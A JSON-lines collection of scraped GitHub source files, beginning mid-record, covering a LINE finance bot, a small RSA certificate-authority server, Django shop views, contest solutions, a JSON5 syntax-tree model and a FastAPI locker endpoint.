application.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n abort(400)\n return 'OK'\n\n\n\n@handler.add(MessageEvent, message=TextMessage)\n\n\n# def handle_message(event):\n# line_bot_api.reply_message(\n# event.reply_token,\n# TextSendMessage(text=event.message.text))\n\n\n#追加\n\ndef text_message_handler(event):\n\n VALUE = (yesterday_sum() - today_sum())\n\n\n if re.match('.*残高.*',event.message.text):\n line_bot_api.reply_message(event.reply_token, TextSendMessage('残っていないよ'))\n elif re.match('.*差額.*',event.message.text):\n line_bot_api.reply_message(event.reply_token, TextSendMessage('先月との差額は'+str(VALUE)+'円だよ'))\n elif re.match('.*今日.*いくら.*',event.message.text):\n line_bot_api.reply_message(event.reply_token, TextSendMessage('5000円使ったよ'))\n elif re.match('gitub',event.message.text,re.IGNORECASE):\n line_bot_api.reply_message(event.reply_token, TextSendMessage('https://github.com/jphacks/ON_1801'))\n else:\n line_bot_api.reply_message(event.reply_token, TextSendMessage('ちゃんと話して!'))\n\n\n#zaimに問い合わせ\n\ndef request_zaim_setup():\n zapi = zaim.Api(consumer_key=os.environ['ZAIM_KEY'],\n consumer_secret=os.environ['ZAIM_SECRET'],\n access_token=os.environ['ACCESS_TOKEN_ZAIM'],\n access_token_secret=os.environ['ACCESS_TOKEN_ZAIM_SECRET'])\n return zapi\n\n\ndef request_zaim_money_day(zapi, calc_days=0):\n d_day = datetime.today()\n if calc_days != 0:\n if calc_days < 0:\n calc_days *= -1\n d_day = d_day - timedelta(days=calc_days)\n print(d_day.strftime('%Y-%m-%d'))\n day_moneys_json = zapi.money(mapping=1,\n start_date=d_day.strftime('%Y-%m-%d'),\n mode='payment',\n end_date=d_day.strftime('%Y-%m-%d')\n )\n return day_moneys_json\n\n\ndef today_sum():\n return calc_money_sum(request_zaim_money_day(request_zaim_setup()))\n\n\ndef calc_money_sum(moneys):\n summoney = 0\n for money in moneys['money']:\n summoney += money['amount']\n return summoney\n\n\ndef yesterday_sum():\n return calc_money_sum(request_zaim_money_day(request_zaim_setup(), -1))\n\n\nif __name__ == \"__main__\":\n application.run()\n","repo_name":"jphacks/ON_1801","sub_path":"linebot/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"36780861414","text":"# DEPENDENCIES\nimport time\nimport random\nimport json\nimport rsa\nimport datetime\n# PACKAGE CA\nfrom Venus.Crypto.crypto import *\nfrom Venus.TCP.callisto import *\n# Requisição da chave pública de algum nó do cliente para o CA:\n# Resposta do CA para requisições de chave pública:\n# Requisição da Autenticação do cliente para o servidor:\n# Resposta da autenticação do cliente\n# Requisição da operação do cliente\n# Resposta da operação do cliente\n\n\nclass vCA():\n\n def __init__(self):\n self.__CAKEY = \"Venus/CA/data/CAKey.txt\"\n self.__CA_DATABASE = \"Venus/CA/data/database.txt\"\n f = open(self.__CAKEY, \"r\")\n keys = json.loads(f.read())\n f.close()\n self.__publicKey = rsa.PublicKey(\n keys[\"privKey\"][\"n\"], keys[\"privKey\"][\"e\"])\n self.__privateKey = rsa.PrivateKey(\n keys[\"privKey\"][\"n\"], keys[\"privKey\"][\"e\"], keys[\"privKey\"][\"d\"], keys[\"privKey\"][\"p\"], keys[\"privKey\"][\"q\"])\n f = open(self.__CA_DATABASE, \"r\")\n self.__database = json.loads(f.read())\n f.close()\n self.__CAaddr = (keys[\"addr\"][\"ip\"], keys[\"addr\"][\"port\"])\n print(\"CA online\")\n\n def __register(self, addr, n, e):\n\n user = 
str(addr[0]) + \"::\" + str(addr[1])\n self.__database[user] = {}\n self.__database[user][\"n\"] = n\n self.__database[user][\"e\"] = e\n pkt = {}\n pkt[\"code\"] = \"900\"\n return pkt\n\n def __getKey(self, addr):\n user = str(addr[0]) + \"::\" + str(addr[1])\n\n if user not in self.__database.keys():\n return None\n\n pubKey = rsa.PublicKey(\n self.__database[user][\"n\"], self.__database[user][\"e\"])\n return pubKey\n\n def __handleResponse(self, packet):\n\n packet = decrypt(packet, self.__privateKey)\n msg = json.loads(packet.decode(\"utf-8\"))\n\n if msg[\"code\"] == \"000\":\n addr = msg[\"addr\"]\n msg = self.__register(addr, msg[\"n\"], msg[\"e\"])\n pubKey = self.__getKey(addr)\n\n elif msg[\"code\"] == \"001\":\n addr = msg[\"addr\"]\n pubKey = rsa.PublicKey(msg[\"n\"], msg[\"e\"])\n ret = self.__getKey(addr)\n\n if ret == None:\n msg = {}\n msg[\"code\"] = \"901\"\n else:\n msg = {}\n msg[\"code\"] = \"900\"\n msg[\"addr\"] = addr\n msg[\"n\"] = ret.n\n msg[\"e\"] = ret.e\n else:\n msg = {}\n msg[\"code\"] = \"901\"\n\n pkt = json.dumps(msg).encode(\"utf-8\")\n pkt = encrypt(pkt, pubKey)\n return pkt\n\n def __close(self):\n f = open(self.__CA_DATABASE, \"w\")\n txt = json.dumps(self.__database)\n f.write(txt)\n f.close()\n\n def listen(self, lifetime=None):\n channel = callistoServer(\n self.__handleResponse, self.__CAaddr, lifetime=lifetime)\n print(\"Servidor ouvindo em \", str(self.__CAaddr))\n channel.start()\n self.__close()\n print(\"closed\")\n","repo_name":"kinhosz/Venus","sub_path":"src/Venus/CA/ca.py","file_name":"ca.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"17228246659","text":"from django.shortcuts import render\nfrom seller.models import Item,ItemPicture,shop\nfrom .models import PageView,CartItem,Shipping\n\n#import requests\n#import xmltodict\nimport json\n#from authentication.models import Profile\nimport datetime\nimport os\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse, HttpResponseRedirect,HttpResponse\nimport json\n\n# Create your views here.\ndef sort_item(queryset):\n results = {}\n for i in queryset:\n try:\n results[i.item_id] = results[i.item_id] + 1\n except KeyError:\n results[i.item_id] = 1\n return results\ndef index(request):\n if request.GET.get(\"q\") is not None:\n query = request.GET.get(\"q\")\n results = []\n items = Item.objects.filter(name__contains=query) | \\\n Item.objects.filter(discription__contains=query) | \\\n Item.objects.filter(item_id__contains=query)\n\n for i in items:\n item_pic = ItemPicture.objects.filter(item_id=i.item_id)[0]\n results.append([item_pic, i])\n\n return render(request, \"shopper/search.html\", {\n \"items\": results,\n \"q\": query\n })\n \n else:\n current_hour = datetime.datetime.now().hour\n #slogo=shop()\n \n\n try:\n PageView.objects.filter(timestamp__hour=str(current_hour-1)).delete()\n except Exception as e:\n print(e)\n PageView.objects.filter(timestamp__hour=str(current_hour)).delete()\n\n popular_items = []\n result = sort_item(PageView.objects.filter())\n print(result)\n for i in result:\n item = Item.objects.get(item_id=i)\n pic = ItemPicture.objects.filter(item_id=item.item_id)[0]\n popular_items.append([item, result[i], pic])\n\n return render(request, \"shopper/index.html\", {\n \"popular\": popular_items,\n\n #\"shops\": slogo\n \n }) \n\ndef view_item(request,item_id):\n \n item = Item.objects.get(item_id=item_id)\n images = 
ItemPicture.objects.filter(item_id=item_id)\n    \n    PageView(item_id=item_id).save()\n    print(images[1:])\n\n    return render(request, \"shopper/viewitem.html\", {\n        \n        \"item\": item,\n        #\"image0\": images[0],\n        \"imgs0\": images[0],\n        \"imgs\": images[1:]\n    })    \n@csrf_exempt\ndef add_cart(request):\n\n    post_data = json.loads(request.body.decode(\"utf-8\"))\n    # https://stackoverflow.com/questions/61543829/django-taking-values-from-post-request-javascript-fetch-api\n\n    item_id = post_data[\"item_id\"]\n    quantity = post_data[\"quantity\"]\n    user_id = request.user.id\n\n    CartItem(item_id=item_id, user_id=user_id, quantity=quantity).save()\n\n    return JsonResponse({\"code\": 200})\n\n\ndef cart(request):\n    data = []\n    items = CartItem.objects.filter(user_id=request.user.id)\n    price = 0\n\n    for i in items:\n        item = Item.objects.get(item_id=i.item_id)\n        pic = ItemPicture.objects.filter(item_id=i.item_id)[0]\n        data.append([item, i, pic])\n        print(i.quantity)\n        price += item.price * i.quantity  # accumulate the cart total instead of overwriting it\n\n    return render(request, \"shopper/cart.html\", {\n        \"data\": data,\n        \"price\": '%.2f' % round(price, 2)\n    })\n\n@csrf_exempt\ndef delete_cart(request):\n\n    post_data = json.loads(request.body.decode(\"utf-8\"))\n    # https://stackoverflow.com/questions/61543829/django-taking-values-from-post-request-javascript-fetch-api\n\n    item_id = post_data[\"item_id\"]\n    user_id = request.user.id\n\n    CartItem.objects.get(item_id=item_id, user_id=user_id).delete()\n\n    return JsonResponse({\"code\": 200})\n@csrf_exempt\ndef modify_cart(request):\n\n    post_data = json.loads(request.body.decode(\"utf-8\"))\n    item_id = post_data[\"item_id\"]\n    user_id = request.user.id\n    quantity = post_data[\"quantity\"]\n\n    c = CartItem.objects.get(user_id=user_id, item_id=item_id)\n    c.quantity = quantity\n    c.save()\n\n    return JsonResponse({\"code\": 200})\n\ndef checkout(request):\n    if request.method == \"POST\":\n        sfname = request.POST[\"sname\"]\n        slname =request.POST[\"slname\"]\n        smail =request.POST[\"mid\"]\n        sphone =request.POST[\"ph\"]\n        address = request.POST[\"adrs\"]\n        state = request.POST[\"state\"]\n        city =request.POST[\"city\"]\n        zip = request.POST[\"zip\"]\n        items = CartItem.objects.filter(user_id=request.user.id)\n        \n        for i in items:\n            item = Item.objects.get(item_id=i.item_id)\n            quantity = i.quantity\n            print(item.item_id,\"itemmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm\")\n            print(item.shop_id,\"shopppppppppppppppppppppppppppppppppppppppppppppppppppppppp\")\n            print(i.item_id,\"iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\") \n            s=Shipping()\n            s.firstname=sfname\n            s.lastname=slname\n            s.email=smail\n            s.mobile=sphone\n            \n            s.address=address\n            s.state=state\n            s.city=city\n            s.pincode=zip\n            s.shop_id=item.shop_id\n            s.item_id=i.item_id\n            s.quantity=quantity\n            s.save()\n\n        return HttpResponse(\"Order placed successfully. The seller will contact you shortly.\")\n    else:\n        return render(request,\"shopper/checkout.html\") \n","repo_name":"AmalprashobM/Django-project","sub_path":"shopper/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"73172269976","text":"#!/usr/bin/env pypy3\n\ndef fprint(*args):\n\tprint(*args, flush=True)\n\n### CODE HERE\n\n\nfrom itertools import chain, combinations\n\ndef ss(B):\n\n\tif not sum(B) % 2 == 0: return False\n\ttarget = sum(B) // 2\n\n\timport array\n\tpossible = array.array('b', [1] + [0]*target)\n\n\tfor b in 
B:\n\t\tnext_possible = array.array('b', possible)\n\t\tfor i in range(len(possible)):\n\t\t\tif possible[i] != 1: continue\n\t\t\tif i + b > target: continue\n\t\t\tif target == i + b:\n\t\t\t\treturn True\n\t\t\tif i + b < target:\n\t\t\t\tnext_possible[i+b] = 1\n\t\tpossible = next_possible\n\n\treturn False\n\ndef subsets(iterable, low=0, high=None):\n \"subsets([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)\"\n s = list(iterable)\n if high is None:\n high = len(s)\n return chain.from_iterable(combinations(s, r) for r in range(low, high+1))\n\ndef get_ss(B):\n\tfor ss in subsets(B):\n\t\tif sum(ss) == sum(B)//2: return ss\n\treturn False\n\ndef ok(B):\n\tif len(B) <= 1: return False\n\tif sum(B) % 2 != 0: return False\n\tif ss(B):\n\t\tassert(get_ss(B))\n\t\treturn True\n\treturn False\n\ndef tries(N):\n\timport random\n\tB = []\n\tlow = 1\n\twhile True:\n\t\tif ok(B):\n\t\t\treturn B\n\t\tB += [random.randrange(low, low+N)]\n\t\tlow += N\n\nN = int(input())\n\ndef query(arr):\n arr = [\"?\"] + list(map(str,arr))\n fprint(*arr)\n return int(input())\n\nB = []\nlow = 1\nwhile True:\n if ok(B):\n break\n B += [query(range(low, low+N))]\n low += N\n\nB1 = get_ss(B)\nB2 = []\nfor b in B:\n if b not in B1:\n B2 += [b]\n\nfprint(f\"! {len(B1)} {len(B2)}\")\nfprint(*B1)\nfprint(*B2)\n","repo_name":"ldct/cp","sub_path":"OI/EGOI/2021/C/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"29994884366","text":"def solution(prices):\n from collections import deque\n prices = deque(prices)\n answer = []\n \n while prices:\n i=0\n cur = prices.popleft()\n if not prices:\n answer.append(0)\n break\n else:\n for p in prices:\n i+=1\n if p typing.Generator[Node, None, None]:\n todo = deque([root])\n while todo:\n node: Node = todo.popleft()\n todo.extend(iter_child_nodes(node))\n yield node\n\n\ndef iter_child_nodes(node: Node) -> typing.Generator[Node, None, None]:\n for attr, value in iter_fields(node):\n if isinstance(value, Node):\n yield value\n elif isinstance(value, list):\n for item in value:\n if isinstance(item, Node):\n yield item\n\n\ndef iter_fields(node: Node) -> typing.Generator[tuple[str, Any], None, None]:\n for field_name in node._fields:\n try:\n value = getattr(node, field_name)\n yield field_name, value\n except AttributeError:\n pass\n\n\nclass Node:\n excluded_names = ['excluded_names', 'wsc_before', 'wsc_after', 'leading_wsc', 'tok', 'end_tok']\n\n def __init__(self, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None):\n # Whitespace/Comments before/after the node\n self.wsc_before: list[str | Comment] = []\n self.wsc_after: list[str | Comment] = []\n self._tok: JSON5Token | None = tok\n self._end_tok: JSON5Token | None = end_tok\n\n @property\n def col_offset(self) -> int | None:\n if self._tok is None:\n return None\n return self._tok.colno\n\n @property\n def end_col_offset(self) -> int | None:\n if self._end_tok is None:\n return None\n return self._end_tok.end_colno\n\n @property\n def lineno(self) -> int | None:\n if self._tok is None:\n return None\n return self._tok.lineno\n\n @property\n def end_lineno(self) -> int | None:\n if self._end_tok is None:\n return None\n r = self._end_tok.end_lineno\n return r\n\n def __repr__(self) -> str:\n rep = (\n f\"{self.__class__.__name__}(\"\n + \", \".join(\n f\"{key}={repr(value)}\"\n for key, value in self.__dict__.items()\n if not key.startswith('_') and key not in 
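The `ss` function above is the classic subset-sum reachability DP: mark every sum reachable with a prefix of B and test whether sum(B)//2 is hit. The same idea written with a set, as a tiny standalone check; the example values are arbitrary:

```python
# Same reachability DP as ss() above, using a set instead of a byte array.
def can_split_evenly(values):
    total = sum(values)
    if total % 2:
        return False
    target = total // 2
    reachable = {0}
    for v in values:
        reachable |= {r + v for r in reachable if r + v <= target}
    return target in reachable

assert can_split_evenly([3, 1, 4, 2])   # 3 + 2 == 1 + 4
assert not can_split_evenly([1, 2, 4])  # odd total can never split
```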
self.excluded_names\n )\n + \")\"\n )\n return rep\n\n @property\n def _fields(self) -> list[str]:\n fields = [item for item in list(self.__dict__) if not item.startswith('_') and item not in self.excluded_names]\n fields.extend(['wsc_before', 'wsc_after'])\n return fields\n\n\nclass JSONText(Node):\n def __init__(self, value: Value, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None):\n assert isinstance(value, Value)\n self.value: Value = value\n super().__init__(tok=tok, end_tok=tok)\n\n\nclass Value(Node):\n pass\n\n\nclass Key(Node):\n ...\n\n\nclass JSONObject(Value):\n def __init__(\n self,\n *key_value_pairs: KeyValuePair,\n trailing_comma: TrailingComma | None = None,\n leading_wsc: list[str | Comment] | None = None,\n tok: JSON5Token | None = None,\n end_tok: JSON5Token | None = None,\n ):\n keys: list[Key] = []\n values: list[Value] = []\n for key, value in key_value_pairs:\n assert isinstance(key, Key)\n assert isinstance(value, Value)\n keys.append(key)\n values.append(value)\n assert len(keys) == len(values)\n self.keys: list[Key] = keys\n self.values: list[Value] = values\n assert leading_wsc is None or all(isinstance(item, str) or isinstance(item, Comment) for item in leading_wsc)\n self.trailing_comma: TrailingComma | None = trailing_comma\n self.leading_wsc: list[str | Comment] = leading_wsc or []\n\n super().__init__(tok=tok, end_tok=end_tok)\n\n @property\n def key_value_pairs(self) -> list[KeyValuePair]:\n return list(KeyValuePair(key, value) for key, value in zip(self.keys, self.values))\n\n\nclass JSONArray(Value):\n def __init__(\n self,\n *values: Value,\n trailing_comma: TrailingComma | None = None,\n leading_wsc: list[str | Comment] | None = None,\n tok: JSON5Token | None = None,\n end_tok: JSON5Token | None = None,\n ):\n vals = list(values)\n for value in vals:\n assert isinstance(value, Value), f\"Was expecting object with type Value. 
Got {type(value)}\"\n assert leading_wsc is None or all(isinstance(item, str) or isinstance(item, Comment) for item in leading_wsc)\n self.values: list[Value] = vals\n self.trailing_comma: TrailingComma | None = trailing_comma\n self.leading_wsc: list[str | Comment] = leading_wsc or []\n\n super().__init__(tok=tok, end_tok=end_tok)\n\n\nclass Identifier(Key):\n def __init__(\n self, name: str, raw_value: str | None = None, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None\n ):\n assert isinstance(name, str)\n if raw_value is None:\n raw_value = name\n assert isinstance(raw_value, str)\n assert len(name) > 0\n self.name: str = name\n self.raw_value: str = raw_value\n\n super().__init__(tok=tok, end_tok=tok)\n\n def __hash__(self) -> int:\n return hash(self.name)\n\n def __eq__(self, other: Any) -> bool:\n return hash(self) == hash(other)\n\n\nclass Number(Value):\n ...\n\n\nclass Integer(Number):\n def __init__(\n self,\n raw_value: str,\n is_hex: bool = False,\n is_octal: bool = False,\n tok: JSON5Token | None = None,\n end_tok: JSON5Token | None = None,\n ):\n assert isinstance(raw_value, str)\n if is_hex and is_octal:\n raise ValueError(\"is_hex and is_octal are mutually exclusive\")\n if is_hex:\n value = int(raw_value, 0)\n elif is_octal:\n if raw_value.startswith('0o'):\n value = int(raw_value, 8)\n else:\n value = int(raw_value.replace('0', '0o', 1), 8)\n else:\n value = int(raw_value)\n self.value: int = value\n self.raw_value: str = raw_value\n self.is_hex: bool = is_hex\n self.is_octal: bool = is_octal\n\n super().__init__(tok=tok, end_tok=end_tok or tok)\n\n\nclass Float(Number):\n def __init__(\n self,\n raw_value: str,\n exp_notation: str | None = None,\n tok: JSON5Token | None = None,\n end_tok: JSON5Token | None = None,\n ):\n value = float(raw_value)\n assert exp_notation is None or exp_notation in ('e', 'E')\n self.raw_value: str = raw_value\n self.exp_notation: str | None = exp_notation\n\n self.value: float = value\n super().__init__(tok=tok, end_tok=end_tok or tok)\n\n\nclass Infinity(Number):\n def __init__(self, negative: bool = False, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None):\n self.negative: bool = negative\n\n super().__init__(tok=tok, end_tok=tok)\n\n @property\n def value(self) -> float:\n return math.inf if not self.negative else -math.inf\n\n @property\n def const(self) -> Literal['Infinity', '-Infinity']:\n if self.negative:\n return '-Infinity'\n else:\n return 'Infinity'\n\n\nclass NaN(Number):\n def __init__(self, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None):\n super().__init__(tok=tok, end_tok=tok)\n\n @property\n def value(self) -> float:\n return math.nan\n\n @property\n def const(self) -> Literal['NaN']:\n return 'NaN'\n\n\nclass String(Value, Key):\n def __init__(\n self, characters: str, raw_value: str, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None\n ):\n assert isinstance(raw_value, str)\n assert isinstance(characters, str)\n self.characters: str = characters\n self.raw_value: str = raw_value\n\n super().__init__(tok=tok, end_tok=tok)\n\n\nclass DoubleQuotedString(String):\n ...\n\n\nclass SingleQuotedString(String):\n ...\n\n\nclass BooleanLiteral(Value):\n def __init__(self, value: bool, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None):\n assert value in (True, False)\n self.value: bool = value\n\n super().__init__(tok=tok, end_tok=tok)\n\n\nclass NullLiteral(Value):\n value = None\n\n def __init__(self, tok: JSON5Token | None = None, end_tok: JSON5Token 
| None = None):\n super().__init__(tok=tok, end_tok=tok)\n\n\nclass UnaryOp(Value):\n def __init__(\n self, op: Literal['-', '+'], value: Number, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None\n ):\n assert op in ('-', '+')\n assert isinstance(value, Number)\n self.op: Literal['-', '+'] = op\n self.value: Number = value\n\n super().__init__(tok=tok, end_tok=end_tok)\n\n\nclass TrailingComma(Node):\n def __init__(self, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None):\n super().__init__(tok=tok, end_tok=tok) # Trailing comma is always a single COMMA token\n\n\nclass Comment(Node):\n def __init__(self, value: str, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None):\n assert isinstance(value, str), f\"Expected str got {type(value)}\"\n self.value: str = value\n super().__init__(tok=tok, end_tok=tok) # Comments are always a single token\n\n\nclass LineComment(Comment):\n ...\n\n\nclass BlockComment(Comment):\n ...\n","repo_name":"spyoungtech/json-five","sub_path":"json5/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10010,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"68"} +{"seq_id":"29995016176","text":"def rotate(cur, flag):\n _next = []\n if flag == 0:\n _next = [cur[0],cur[1]-1]\n elif flag == 1:\n _next = [cur[0]-1,cur[1]]\n elif flag == 2:\n _next = [cur[0],cur[1]+1]\n elif flag == 3:\n _next = [cur[0]+1,cur[1]]\n \n if flag >= 3:\n flag = 0\n else:\n flag+=1\n \n \n return [_next, flag]\n\ndef choose_next(cur, flag):\n _next = []\n if flag == 0:\n _next = [cur[0],cur[1]+1]\n elif flag == 1:\n _next = [cur[0]+1,cur[1]]\n elif flag == 2:\n _next = [cur[0],cur[1]-1]\n elif flag == 3:\n _next = [cur[0]-1,cur[1]]\n\n return _next\n\ndef solution(rows, columns, queries):\n answer = []\n targets = []\n matrix = [[row * columns + col + 1 for col in range(columns)] for row in range(rows)]\n \n for querie in queries:\n targets.append([(querie[0], querie[1]), (querie[2], querie[3])])\n \n for target in targets:\n lt = [min(target[0][0], target[1][0])-1, min(target[0][1], target[1][1])-1]\n rt = [min(target[0][0], target[1][0])-1, max(target[0][1], target[1][1])-1]\n lb = [max(target[0][0], target[1][0])-1, min(target[0][1], target[1][1])-1]\n rb = [max(target[0][0], target[1][0])-1, max(target[0][1], target[1][1])-1]\n\n start = lt\n cur = lt\n tmp_min = float('inf')\n _next = []\n flag = 0\n last_num = matrix[cur[0]][cur[1]]\n\n while True:\n tmp_min = min(tmp_min, matrix[cur[0]][cur[1]])\n cur_num = matrix[cur[0]][cur[1]]\n matrix[cur[0]][cur[1]] = last_num\n last_num = cur_num\n _next = choose_next(cur, flag)\n\n if _next[0]lb[0] or _next[0]<0 or _next[0]>=rows or _next[1]rt[1] or _next[1]<0 or _next[1]>=columns:\n _next,flag = rotate(_next, flag)\n _next = choose_next(cur, flag)\n\n if _next == start:\n matrix[_next[0]][_next[1]] = last_num\n break\n cur = _next\n answer.append(tmp_min)\n \n return answer\n\nsolution(\t6, 6, [[2, 2, 5, 4], [3, 3, 6, 6], [5, 1, 6, 3]] )","repo_name":"DongjinS/algorithm_study","sub_path":"programmers/행렬테두리회전하기.py","file_name":"행렬테두리회전하기.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17346146673","text":"import json\n\nfrom asgiref.sync import sync_to_async\nfrom channels.db import database_sync_to_async\nfrom channels.generic.websocket import AsyncWebsocketConsumer\n\nfrom users.models import CustomUser\n\n\nclass 
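The Node classes above form a small JSON5 AST; `iter_nodes` walks it breadth-first through each node's `_fields`. A hand-built example, assuming `KeyValuePair` is the (key, value) pair type that `JSONObject.__init__` unpacks:

```python
# Hand-built model tree walked with iter_nodes(); KeyValuePair is assumed
# to be the (key, value) pair type consumed by JSONObject.__init__.
root = JSONObject(
    KeyValuePair(Identifier("answer"), Integer("42")),
)
print([type(n).__name__ for n in iter_nodes(root)])
# -> ['JSONObject', 'Identifier', 'Integer']
```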
GameRoomConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n self.gamename = self.scope['url_route']['kwargs']['gamename']\n self.game_group_name = f'game_{self.gamename}'\n await self.channel_layer.group_add(\n self.game_group_name,\n self.channel_name\n )\n await self.accept()\n\n async def receive(self, text_data=None, byte_data=None):\n text_data_json = json.loads(text_data)\n message = text_data_json['message']\n if message == 'ready':\n await self.channel_layer.group_send(\n self.game_group_name,\n {\n 'type': 'block_buttons',\n 'message': 'block',\n 'username': self.scope['user'].username,\n 'user_id': self.scope['user'].id\n }\n )\n elif message == 'unlock':\n await self.channel_layer.group_send(\n self.game_group_name,\n {\n 'type': 'unlock_buttons',\n 'message': 'unlocked'\n }\n )\n elif message == 'update':\n await self.channel_layer.group_send(\n self.game_group_name,\n {\n 'type': 'update_buttons',\n 'message': 'updated'\n }\n )\n\n async def block_buttons(self, event):\n await self.send(text_data=json.dumps({\n 'message': event['message'],\n 'username': event['username'],\n 'user_id': event['user_id']\n }))\n\n async def unlock_buttons(self, event):\n await self.send(text_data=json.dumps({\n 'message': event['message'],\n }))\n\n async def update_buttons(self, event):\n await self.send(text_data=json.dumps({\n 'message': event['message'],\n }))\n\n\n def get_name(self):\n return CustomUser.objects.all()[0].username\n\n\n async def disconnect(self, close_code):\n await self.channel_layer.group_discard(\n self.game_group_name,\n self.channel_name\n )\n\n","repo_name":"NoM0reParties/my_game","sub_path":"dj_app/quiz/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1420378203","text":"#!/usr/bin/env python\n# PYTHON_ARGCOMPLETE_OK\nimport interpreter\nimport inspect\nimport imp\nimport sys\nimport os\n\n\ndef k_runner():\n \"\"\"k command handler - searcher of the key.py file before handing over control to the CLI.\"\"\"\n # Check every directory from the current all the way to / for a file named key.py\n checkdirectory = os.getcwd()\n directories_checked = []\n keypy_filename = None\n while not os.path.ismount(checkdirectory):\n directories_checked.append(checkdirectory)\n if os.path.exists(\"{0}{1}key.py\".format(checkdirectory, os.sep)):\n keypy_filename = \"{0}{1}key.py\".format(checkdirectory, os.sep)\n break\n else:\n checkdirectory = os.path.abspath(os.path.join(checkdirectory, os.pardir))\n\n if not keypy_filename:\n sys.stderr.write(\"key.py not found in the following directories:\\n\\n\")\n sys.stderr.write('\\n'.join(directories_checked))\n sys.stderr.write(\"\\n\\nSee http://projectkey.readthedocs.org/en/latest/quickstart.html\\n\")\n sys.exit(1)\n else:\n interpreter.cli(imp.load_source(\"key\", keypy_filename))\n","repo_name":"crdoconnor/projectkey","sub_path":"projectkey/k_runner.py","file_name":"k_runner.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"43931830931","text":"#!/usr/bin/env python\n\nfrom abnrlib.icm import ICManageCLI\nfrom altera_icm.abnr_utils import run_command\nimport json\n\nicm = ICManageCLI()\n\nfilename = '//depot/icm/proj/{}/{}/ipspec/dev/cell_names.txt'\ncmd = 'icmp4 print -q ' + filename\n\ndata = []\nprojects = ['i14socnd', 'Crete3', 'i10socfm']\nfor project in projects:\n for 
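GameRoomConsumer above reads `gamename` out of `scope['url_route']`, which implies a Channels routing entry along these lines; the ws path pattern is an assumption, not taken from the repository:

```python
# Hypothetical routing module wiring GameRoomConsumer into Channels.
from django.urls import re_path

websocket_urlpatterns = [
    re_path(r"ws/game/(?P<gamename>\w+)/$", GameRoomConsumer.as_asgi()),
]
```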
variant in icm.get_variants(project):\n        exitcode, stdout, stderr = run_command(cmd.format(project, variant))\n        cellnames = [line.strip() for line in stdout.splitlines() if not line.startswith('//') and not line.startswith(\"#\") and line.strip()]\n        for cellname in cellnames:\n            data.append( [project, variant, cellname] ) \n\nwith open('cellnames.json', 'w') as f:\n    json.dump(data, f, indent=2)\n","repo_name":"lionelta/dmx_main_gdpxl_py23_cth","sub_path":"scripts/extract_all_cellnames_from_icm.py","file_name":"extract_all_cellnames_from_icm.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"12007416257","text":"from fastapi import APIRouter, Body\nfrom typing import Union, Optional\nfrom pydantic import BaseModel\nfrom datetime import date, datetime\nfrom config.database import mongo_connection\n\nrouter = APIRouter(\n    prefix=\"/lockers\",\n    tags=[\"lockers\"],\n    responses={404: {\"description\": \"Not found\"}},\n)\n\n# this endpoint returns a list of lockers\n# 1. if locker is available, return id and status\n# 2. if locker is not available, return time left in minutes\n# 2.1 if time left is negative (User late to get package), return None\n# 2.2 if time left is positive (User still have time to get package), return time left in minutes\n@router.get(\"/\")\ndef lockers():\n    data = list(mongo_connection[\"Locker\"].find({}, {\"_id\": False}))\n    res = []\n\n    def timeLeft(timeout):\n        now = datetime.now()\n        # still before the deadline: return the minutes remaining\n        if now < timeout:\n            remaining = timeout - now\n            return remaining.total_seconds() // 60\n        # deadline has passed (user is late to get the package): return None\n        else:\n            return None\n\n    for record in data:\n        if record[\"available\"] == True:\n            res.append(record)\n        else:\n            tmp = {\n                \"locker_id\": record[\"locker_id\"],\n                \"available\": record[\"available\"],\n                # # these data is not needed for frontend\n                # \"timeIn\": record[\"timeIn\"],\n                # \"timeout\": record[\"timeout\"],\n                # \"userId\": record[\"userId\"],\n                # \"package\": record[\"package\"],\n                \"timeLeft\": timeLeft(record[\"timeout\"]),\n            }\n            res.append(tmp)\n    return list(res)\n","repo_name":"katisd/Locker-exceed-backend","sub_path":"app/routers/get_locker_time.py","file_name":"get_locker_time.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
